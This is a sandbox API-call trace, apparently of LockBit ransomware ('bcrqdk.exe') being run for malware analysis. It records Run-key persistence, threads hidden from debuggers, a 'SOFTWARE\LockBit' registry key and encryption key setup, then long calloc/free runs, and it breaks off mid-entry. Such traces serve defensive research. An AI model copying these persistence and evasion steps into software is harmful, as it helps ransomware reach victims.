# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 27.03.2020 21:18:50.494 Process: id = "1" image_name = "bcrqdk.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcrqdk.exe" page_root = "0x6be86000" os_pid = "0x2a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x364 [0062.638] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fc48 | out: TokenHandle=0x18fc48*=0xbc) returned 0x0 [0062.649] GetTickCount () returned 0x114a5d1 [0062.649] srand (_Seed=0x114a5d1) [0062.649] rand () returned 27239 [0062.649] rand () returned 15866 [0062.650] rand () returned 8848 [0062.650] rand () returned 27917 [0062.650] rand () returned 8772 [0062.650] rand () returned 3141 [0062.650] rand () returned 6722 [0062.650] rand () returned 4478 [0062.650] rand () returned 30886 [0062.650] rand () returned 2889 [0062.650] rand () returned 12028 [0062.650] rand () returned 21825 [0062.650] rand () returned 456 [0062.650] rand () returned 25568 [0062.650] rand () returned 30076 [0062.650] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe\" ", pNumArgs=0x18fc28 | out: pNumArgs=0x18fc28) returned 0x5314e8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe" [0062.651] GetModuleHandleA (lpModuleName="ntdll") returned 0x77c40000 [0062.651] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateThreadEx") returned 0x77c60894 [0062.652] NtCreateThreadEx (in: ThreadHandle=0x18fc04, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x409810, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fc04*=0xc0, lpBytesBuffer=0x0) returned 0x0 [0062.652] NtSetInformationThread (ThreadHandle=0xc0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0062.652] Sleep (dwMilliseconds=0xc8) [0062.843] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x53bf10 [0062.848] CloseServiceHandle (hSCObject=0x53bf10) returned 1 [0062.851] OpenMutexA (dwDesiredAccess=0x0, bInheritHandle=0, lpName="Global\\{BEF590BE-11A6-442A-A85B-656C1081E04C}") returned 0x0 [0062.851] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\{BEF590BE-11A6-442A-A85B-656C1081E04C}") returned 0x110 [0062.851] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fc04, lpdwDisposition=0x18fb6c | out: phkResult=0x18fc04*=0x118, lpdwDisposition=0x18fb6c*=0x2) returned 0x0 [0062.851] wsprintfW (in: param_1=0x18f960, param_2="\"%s\"" | out: param_1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe\"") returned 50 [0062.852] RegQueryValueExW (in: hKey=0x118, lpValueName="XO1XADpO01", lpReserved=0x0, lpType=0x18fba0, lpData=0x18f758, lpcbData=0x18fba4*=0x104 | out: lpType=0x18fba0*=0x0, lpData=0x18f758*=0xb0, lpcbData=0x18fba4*=0x104) returned 0x2 [0062.852] RegSetValueExW (in: hKey=0x118, lpValueName="XO1XADpO01", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe\"", cbData=0x64 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcrqdk.exe\"") returned 0x0 [0062.852] RegCloseKey (hKey=0x118) returned 0x0 [0062.852] NtOpenProcess (in: ProcessHandle=0x18fc24, DesiredAccess=0x60000, ObjectAttributes=0x18fd18*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18fc68*(UniqueProcess=0x2a8, UniqueThread=0x0) | out: ProcessHandle=0x18fc24*=0x118) returned 0x0 [0062.853] GetSecurityInfo () returned 0x0 [0063.377] RtlAllocateAndInitializeSid (in: IdentifierAuthority=0x18fc3c, SubAuthorityCount=0x1, SubAuthority0=0x0, SubAuthority1=0x0, SubAuthority2=0x0, SubAuthority3=0x0, SubAuthority4=0x0, SubAuthority5=0x0, SubAuthority6=0x0, SubAuthority7=0x0, Sid=0x18fc1c | out: Sid=0x18fc1c*=0x533618*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0x0 [0063.377] CloseHandle (hObject=0x118) returned 1 [0063.377] RtlFreeSid (Sid=0x533618*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0x0 [0063.377] RtlAdjustPrivilege (in: Privilege=0x9, NewValue=1, ForThread=0, OldValue=0x18fc47 | out: OldValue=0x18fc47) returned 0x0 [0063.377] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x540b70 [0063.378] CloseServiceHandle (hSCObject=0x540b70) returned 1 [0063.378] NtCreateThreadEx (in: ThreadHandle=0x18fc04, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41bbe0, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fc04*=0x118, lpBytesBuffer=0x0) returned 0x0 [0063.378] NtSetInformationThread (ThreadHandle=0x118, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0063.378] NtCreateThreadEx (in: ThreadHandle=0x18fc04, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40db80, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fc04*=0x11c, lpBytesBuffer=0x0) returned 0x0 [0063.379] NtSetInformationThread (ThreadHandle=0x11c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0063.379] wvsprintfA (in: param_1=0x18f660, param_2="AES-NI support enabled", arglist=0x18fba0 | out: param_1="AES-NI support enabled") returned 22 [0063.379] wsprintfA (in: param_1=0x18f660, param_2="%s\r\n" | out: param_1="AES-NI support enabled\r\n") returned 24 [0063.379] GetLocalTime (in: lpSystemTime=0x18fb60 | out: lpSystemTime=0x18fb60*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x2e, wMilliseconds=0x366)) [0063.379] wsprintfA (in: param_1=0x18fa60, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:46] ") returned 11 [0063.379] SetThreadUILanguage (LangId=0x409) returned 0x409 [0063.383] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0063.383] WriteFile (in: hFile=0x7, lpBuffer=0x18fa60*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18fa60*, lpNumberOfBytesWritten=0x18fb8c*=0xb, lpOverlapped=0x0) returned 1 [0063.384] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0063.385] WriteFile (in: hFile=0x7, lpBuffer=0x18f660*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18f660*, lpNumberOfBytesWritten=0x18fb8c*=0x18, lpOverlapped=0x0) returned 1 [0063.385] GetConsoleWindow () returned 0x5011c [0063.385] IsWindowVisible (hWnd=0x5011c) returned 0 [0063.385] malloc (_Size=0x483) returned 0x77d368 [0063.385] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\LockBit", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x18fb90, lpdwDisposition=0x18fb4c | out: phkResult=0x18fb90*=0x14c, lpdwDisposition=0x18fb4c*=0x1) returned 0x0 [0063.386] RegQueryValueExA (in: hKey=0x14c, lpValueName="full", lpReserved=0x0, lpType=0x18fb68, lpData=0x428960, lpcbData=0x18fb70*=0x500 | out: lpType=0x18fb68*=0x0, lpData=0x428960*=0x0, lpcbData=0x18fb70*=0x500) returned 0x2 [0063.386] RegQueryValueExA (in: hKey=0x14c, lpValueName="Public", lpReserved=0x0, lpType=0x18fb68, lpData=0x77d368, lpcbData=0x18fb70*=0x103 | out: lpType=0x18fb68*=0x0, lpData=0x77d368*=0xc4, lpcbData=0x18fb70*=0x103) returned 0x2 [0063.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0063.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0063.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x18f274, cbBuffer=0x32, dwFlags=0x2 | out: pbBuffer=0x18f274) returned 0x0 [0064.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0064.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0064.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x18eba8, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x18eba8) returned 0x0 [0064.339] calloc (_Count=0x1, _Size=0x4) returned 0x7713c8 [0064.339] calloc (_Count=0x20, _Size=0x4) returned 0x77dab8 [0064.339] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.339] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.339] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.339] calloc (_Count=0x21, _Size=0x4) returned 0x77fea0 [0064.339] free (_Block=0x77dc50) [0064.339] calloc (_Count=0x21, _Size=0x4) returned 0x77ff30 [0064.339] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0048 [0064.340] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.340] free (_Block=0x7713d8) [0064.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0268 [0064.340] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.340] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0378 [0064.340] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.340] calloc (_Count=0x3, _Size=0x4) returned 0x77ffc0 [0064.340] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0490 [0064.340] free (_Block=0x77dc50) [0064.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0520 [0064.340] free (_Block=0x1fa0490) [0064.340] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.340] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.340] free (_Block=0x7713d8) [0064.340] free (_Block=0x77ffd8) [0064.340] calloc (_Count=0x22, _Size=0x4) returned 0x1fa0630 [0064.340] free (_Block=0x1fa0490) [0064.340] calloc (_Count=0x41, _Size=0x4) returned 0x1fa06c0 [0064.340] free (_Block=0x1fa0630) [0064.340] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.340] free (_Block=0x77ffd8) [0064.340] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.340] free (_Block=0x77ffd8) [0064.340] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.340] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.341] free (_Block=0x77ffd8) [0064.341] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.342] free (_Block=0x77ffd8) [0064.342] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.343] free (_Block=0x77ffd8) [0064.343] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.343] free (_Block=0x77ffd8) [0064.343] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.343] free (_Block=0x77ffd8) [0064.343] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.343] free (_Block=0x77ffd8) [0064.343] calloc (_Count=0x2, _Size=0x4) returned 0x77ffd8 [0064.343] free (_Block=0x77ffd8) [0064.343] free (_Block=0x1fa0268) [0064.343] free (_Block=0x1fa0520) [0064.343] free (_Block=0x1fa0378) [0064.343] free (_Block=0x1fa06c0) [0064.343] free (_Block=0x77ffc0) [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0268 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa02f8 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0388 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0418 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa04a8 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0538 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa05c8 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0658 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa06e8 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0778 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0808 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0898 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0928 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa09b8 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0a48 [0064.343] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.344] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.348] free (_Block=0x1fa0268) [0064.348] free (_Block=0x1fa02f8) [0064.348] free (_Block=0x1fa0388) [0064.348] free (_Block=0x1fa0418) [0064.348] free (_Block=0x1fa04a8) [0064.348] free (_Block=0x1fa0538) [0064.348] free (_Block=0x1fa05c8) [0064.348] free (_Block=0x1fa0658) [0064.348] free (_Block=0x1fa06e8) [0064.348] free (_Block=0x1fa0778) [0064.348] free (_Block=0x1fa0808) [0064.348] free (_Block=0x1fa0898) [0064.348] free (_Block=0x1fa0928) [0064.348] free (_Block=0x1fa09b8) [0064.348] free (_Block=0x1fa0a48) [0064.348] free (_Block=0x1fa0af0) [0064.348] free (_Block=0x1fa0b80) [0064.348] free (_Block=0x1fa0c10) [0064.348] free (_Block=0x1fa0ca0) [0064.348] free (_Block=0x1fa0d30) [0064.348] free (_Block=0x1fa0dc0) [0064.349] free (_Block=0x1fa0e50) [0064.349] free (_Block=0x1fa0ee0) [0064.349] free (_Block=0x1fa0f70) [0064.349] free (_Block=0x1fa1000) [0064.349] free (_Block=0x1fa1090) [0064.349] free (_Block=0x1fa1120) [0064.349] free (_Block=0x1fa11b0) [0064.349] free (_Block=0x1fa1240) [0064.349] free (_Block=0x1fa12d0) [0064.349] free (_Block=0x1fa1360) [0064.349] free (_Block=0x1fa13f0) [0064.349] free (_Block=0x77ff30) [0064.349] free (_Block=0x1fa0048) [0064.349] free (_Block=0x77db40) [0064.349] free (_Block=0x77dbc8) [0064.349] free (_Block=0x77fea0) [0064.349] free (_Block=0x1fa0158) [0064.349] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.349] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.349] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.349] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.349] free (_Block=0x77dc50) [0064.349] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.349] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0064.349] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0064.349] free (_Block=0x7713d8) [0064.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.349] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.349] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0268 [0064.349] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.349] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0064.349] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.349] free (_Block=0x77dc50) [0064.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0380 [0064.350] free (_Block=0x1fa12d0) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc8 [0064.350] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.350] free (_Block=0x7713d8) [0064.350] free (_Block=0x77ffc8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0064.350] free (_Block=0x1fa0490) [0064.350] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0490 [0064.350] free (_Block=0x1fa12d0) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.350] free (_Block=0x7713d8) [0064.350] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.351] free (_Block=0x7713d8) [0064.351] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.352] free (_Block=0x7713d8) [0064.352] free (_Block=0x1fa0158) [0064.352] free (_Block=0x1fa0380) [0064.353] free (_Block=0x1fa0268) [0064.353] free (_Block=0x1fa0490) [0064.353] free (_Block=0x77ffb0) [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0064.353] calloc (_Count=0x21, _Size=0x4) 